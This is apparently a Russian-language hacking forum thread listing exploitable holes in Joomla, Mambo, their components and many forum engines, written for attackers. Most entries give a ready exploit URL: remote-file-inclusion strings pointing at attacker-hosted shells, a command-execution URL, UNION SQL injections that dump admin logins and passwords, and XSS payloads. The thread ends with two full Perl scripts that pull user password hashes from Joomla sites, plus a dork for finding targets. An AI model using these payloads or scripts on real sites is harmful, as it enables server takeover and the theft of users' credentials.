Обзор уязвимостей популярных движков

[gemaglabin]

URL производителя Mambo CMS : www.mamboserver.com
URL производителя Joomla CMS : www.joomla.org

Что почитать : http://ru-mambo.ru/index.php?option=com_content&task=blogcategory&id=123
http://joom.ru/
http://myjoomla.ru

JOOMLA & MAMBO


Joomla : < 1.0.4
Недостаточно фильтруются данные в параметре "Itemid" в модуле "mod_poll" и в других методах в классе "mosDBTable".

Joomla : 1.0.5
Уязвимость существует из-за того, что программное обеспечение позволяет злоумышленнику получить доступ к vCard других пользователей с помощью специально сформированного URL.

Joomla : 1.0.10 ; 4.5.4 и 4.6 RC2 ( Mambo )
Уязвимость существует из-за недостаточной фильтрации входящего параметра "id" и позволяет выполнять произвольный SQL запросы.
Примечание : Для удачной эксплуатации уязвимости злоумышленник должен иметь привилегии редактора.

Joomla : 1.0.7
Уязвимость существует при обработке входных данных в сценарии includes/feedcreator.class.php.
Эксплоит : index.php?option=com_rss&feed=filename_here&no_html=1
Уязвимость существует при обработке входных данных в сценарии includes/phpInputFilter/class.inputfilter.php.
Эксплоит :index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>

Joomla : 1.0.9
Уязвимость существует из-за недостаточной обработки входных данных в параметре "Name".

Mambo : 3.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_mambatstaff/mambatstaff.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Mambo : 4.5.2.3
Уязвимость существует из-за ошибки в уровне эмуляции "register_globals" в сценарии "globals.php".
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

УЯЗВИМОСТИ В МОДАХ-НАДСТРОЙКАХ ДЛЯ JOOMLA CMS

Community Builder 1.0 RC 2 и 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_comprofiler/plugin.class.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

JIM : 1.0.1
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'install.jim.php'
Эксплоит : http://victim/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Coppermine 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'cpg.php'
Эксплоит : http://victim/components/com_cpg/cpg.php?m..._absolute_path=
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Webring 1.0
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'admin.webring.docs.php'
Эксплоит : http://victim/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

JD-Wiki < 1.0.3
Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'main.php'
Эксплоит : /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Security Images 3.0.5
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path"
Эксплоит : http://victim/components/com_securityimage...ttp://shell.txt
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Colophon 1.2
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php.
Эксплоит :htttp:/victim/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

Mambo-SMF Forum 1.3.1.3
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php.
Эксплоит : http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts]
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

PollXT 1.22.07
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php.
Эксплоит : http://victim/components/com_pollxt/conf.p...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

perForms 1.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php.
Эксплоит : http://www.vuln.com/components/com_perform...http://evilhost
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

com_hashcash 1.2.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php.
Эксплоит : http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt?
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена

PccookBook 1.3.1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php.
Эксплоит : http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

 

[gemaglabin]

ExBB
Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell

MercuryBoard <= 1.1.4
Отсутсвующая проверка поля USER-AGENT привела к sql иньекции
Эксплоит : http://milw0rm.com/exploits/2247

VistaBB <= 2.x
Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251

Simple Machines Forum

1.Simple Machines Forum <= 1.1
Ошибка в скрипте регистрации,позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/2231

2.Simple Machines Forum <= 1.3.1.3
Уязвимость в компоненте-надстройки форума SMF над MamboCMS
http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts][/color]

Woltlab Burning Board 2.3.5
Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810

MiniBB <=1.5
Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?

MyBB
1.MyBB <= 1.1.5
Недостаточная обработка поля CLIENT-IP позволяет создать юзера с привеллегиями администратора
Эксплоит : http://milw0rm.com/exploits/2012

2.MyBB <= 1.1.3
Уязвимость в скрипте member.php приводит к созданию нового администратора форума
Эксплоит : http://milw0rm.com/exploits/1950

3.MyBB < 1.1.3
Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909

PHORUM 5
Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008

UBB Threads
1.UBBThreads 5.x,6.x
Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере
2.UBB.threads >= 6.4.x
Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

Zix Forum
Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

qjForum
Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

tinyBB <= 0.3
Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

FunkBoard
Уязвимост в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875

QBoard <= v.1.1
Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]

FlashBB <= 1.1.5
Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921

LiteForum 2.1.1
Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt

Forum Russian Board 4.2
Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt

OpenBB 1.0.5
SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt

Gravity Board X v1.1
Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt

Zorum forum
Выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt

Yabb SE forum
Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии Sources/Profile.php

Спойлер: 200

Эксплоит : Rush Security Team

 

[system(#036;cmd)]

Спойлер: 3 у вас 43

UBB Threads

/previewskin.php?skin=infopop.css" type="text/css"><script src="http://xakep/xss.js"></script><!--

UBB Classic

/ultimatebb.cgi?ubb=avatar_select;start_with=0;avatar_url=http://ya.ru/logo.gif"><script src="http://xakep/xss.js"></script><!--

ЗЫ
Сам искал.. давно уже, приват humbsup:

 

[[br]]

Joomla <=1.0.10 (poll component) Arbitrary Add Votes Exploit
сплоит

 

[AKella]

Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit

04 декабря, 2008

Цель: Joomla Component com_jmovies 1.1
Воздействие: SQL-инъекция

Код эксплоита:

#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;


my $host = shift;
my $myid = shift or &help;

my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
           "from+jos_users+where+id=${myid}--";

my $http = new LWP::UserAgent(
                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
                               timeout => '5',
                             );  


my $response = $http->get($host.$path);

if($response->content =~ /!_(.+?)!_/i)
{
     print STDOUT "Hash MD5: $1\n";
     print STDOUT "Password: ".search_md5($1)."\n";
     exit;
}
else
{
     print STDOUT "Exploit Failed!\n";
     exit;
}



sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;

     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
     if(length($hash) < 32 && !is_error($cont))
     {
          return $cont;
     }
}  


sub help
{
     print STDOUT "Usage: perl $0 [host] [user ID]\n";
     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
     exit;
}

 

[CryNet]

exploit for joomla

Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
3xpl01t c0d3 :

Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
author :  devil-zone.net
greet is to : devil-zone.net  all members 
vel = sqlI

S1mPl3 P3rL 3xpl01t3r

#!/usr/bin/perl
#greet is to Evil-Dz
system("clear");
print "***************************************\n";
print "         Good Luck & Hafe Fun         *\n";
print "       Coded by devil-zone forum      *\n"; 
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";
chomp(my $target=<STDIN> );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}